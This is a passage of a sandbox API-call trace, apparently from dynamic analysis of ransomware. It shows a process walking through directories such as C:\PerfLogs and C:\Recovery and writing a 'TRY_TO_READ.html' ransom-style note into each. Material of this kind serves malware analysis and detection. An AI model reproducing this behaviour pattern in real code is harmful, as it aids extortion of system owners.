nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.538] GetLastError () returned 0x5 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dec8 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34def0 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dec8 | out: hHeap=0x2e0000) returned 1 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34def0 | out: hHeap=0x2e0000) returned 1 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34def0 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a68 [0116.539] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a78 [0116.539] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.539] GetLastError () returned 0x5 [0116.539] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.539] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.539] GetLastError () returned 0x5 [0116.539] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x50) returned 0x324b98 [0116.539] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3e0 [0116.541] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.541] WriteFile (in: hFile=0x3e0, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.542] WriteFile (in: hFile=0x3e0, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.542] WriteFile (in: hFile=0x3e0, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.542] CloseHandle (hObject=0x3e0) returned 1 [0116.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a78 | out: hHeap=0x2e0000) returned 1 [0116.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a68 | out: hHeap=0x2e0000) returned 1 [0116.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0116.542] FindNextFileW (in: hFindFile=0x317c08, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96f232f0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.542] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.542] GetLastError () returned 0x0 [0116.542] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0116.542] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.542] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0116.542] FindNextFileW (in: hFindFile=0x317c08, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96f232f0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.543] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dec8 [0116.543] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dea0 | out: hHeap=0x2e0000) returned 1 [0116.543] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df40 | out: hHeap=0x2e0000) returned 1 [0116.543] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df18 | out: hHeap=0x2e0000) returned 1 [0116.543] FindFirstFileW (in: lpFileName="C:\\\\PerfLogs\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317c48 [0116.543] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.543] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.543] GetLastError () returned 0x12 [0116.543] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0116.543] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.543] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.543] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df40 [0116.543] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317c88 [0116.543] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317c88 | out: hHeap=0x2e0000) returned 1 [0116.543] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.543] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.543] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df40 | out: hHeap=0x2e0000) returned 1 [0116.543] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0116.543] FindNextFileW (in: hFindFile=0x317c48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.543] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.543] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.543] GetLastError () returned 0x12 [0116.543] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0116.543] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.543] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.543] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df40 [0116.543] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317c88 [0116.544] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317c88 | out: hHeap=0x2e0000) returned 1 [0116.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.544] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.544] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df40 | out: hHeap=0x2e0000) returned 1 [0116.544] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0116.544] FindNextFileW (in: hFindFile=0x317c48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0116.544] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.544] GetLastError () returned 0x12 [0116.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0116.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df40 [0116.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a68 [0116.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a78 [0116.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.544] GetLastError () returned 0x12 [0116.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.544] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.544] GetLastError () returned 0x12 [0116.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x50) returned 0x324b98 [0116.544] CreateFileW (lpFileName="C:\\\\PerfLogs\\Admin\\TRY_TO_READ.html" (normalized: "c:\\perflogs\\admin\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3e4 [0116.545] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.545] WriteFile (in: hFile=0x3e4, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.546] WriteFile (in: hFile=0x3e4, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.546] WriteFile (in: hFile=0x3e4, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.546] CloseHandle (hObject=0x3e4) returned 1 [0116.546] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.546] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a78 | out: hHeap=0x2e0000) returned 1 [0116.546] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a68 | out: hHeap=0x2e0000) returned 1 [0116.546] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.546] FindNextFileW (in: hFindFile=0x317c48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f232f0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.546] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.546] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.546] GetLastError () returned 0x0 [0116.546] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.546] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.546] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.546] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.546] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.546] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.546] FindNextFileW (in: hFindFile=0x317c48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f232f0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.546] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dea0 [0116.546] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dec8 | out: hHeap=0x2e0000) returned 1 [0116.546] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dfb8 | out: hHeap=0x2e0000) returned 1 [0116.546] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dfe0 | out: hHeap=0x2e0000) returned 1 [0116.546] FindFirstFileW (in: lpFileName="C:\\\\Recovery\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317c88 [0116.547] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.547] GetLastError () returned 0x12 [0116.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.547] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dfb8 [0116.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317cc8 [0116.547] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317cc8 | out: hHeap=0x2e0000) returned 1 [0116.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.547] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.547] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dfb8 | out: hHeap=0x2e0000) returned 1 [0116.547] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.547] FindNextFileW (in: hFindFile=0x317c88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.547] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.547] GetLastError () returned 0x12 [0116.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.547] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dfb8 [0116.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317cc8 [0116.547] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317cc8 | out: hHeap=0x2e0000) returned 1 [0116.547] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.547] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.547] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dfb8 | out: hHeap=0x2e0000) returned 1 [0116.547] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.547] FindNextFileW (in: hFindFile=0x317c88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0116.548] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.548] GetLastError () returned 0x12 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.548] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.548] GetLastError () returned 0x12 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x50) returned 0x324b98 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x50) returned 0x324bf0 [0116.548] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.548] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x70) returned 0x335e78 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dfb8 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x70) returned 0x30e4b0 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a68 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a78 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328a40 [0116.548] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.548] GetLastError () returned 0x12 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.548] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328a40 | out: hHeap=0x2e0000) returned 1 [0116.548] GetLastError () returned 0x12 [0116.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x344ca0 [0116.548] CreateFileW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\TRY_TO_READ.html" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3e8 [0116.549] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.549] WriteFile (in: hFile=0x3e8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.549] WriteFile (in: hFile=0x3e8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.550] WriteFile (in: hFile=0x3e8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.550] CloseHandle (hObject=0x3e8) returned 1 [0116.550] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.550] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a78 | out: hHeap=0x2e0000) returned 1 [0116.550] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a68 | out: hHeap=0x2e0000) returned 1 [0116.550] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.550] FindNextFileW (in: hFindFile=0x317c88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96f232f0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.550] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.550] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.550] GetLastError () returned 0x0 [0116.550] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.550] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.550] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.550] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.550] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.550] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.550] FindNextFileW (in: hFindFile=0x317c88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96f232f0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.550] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 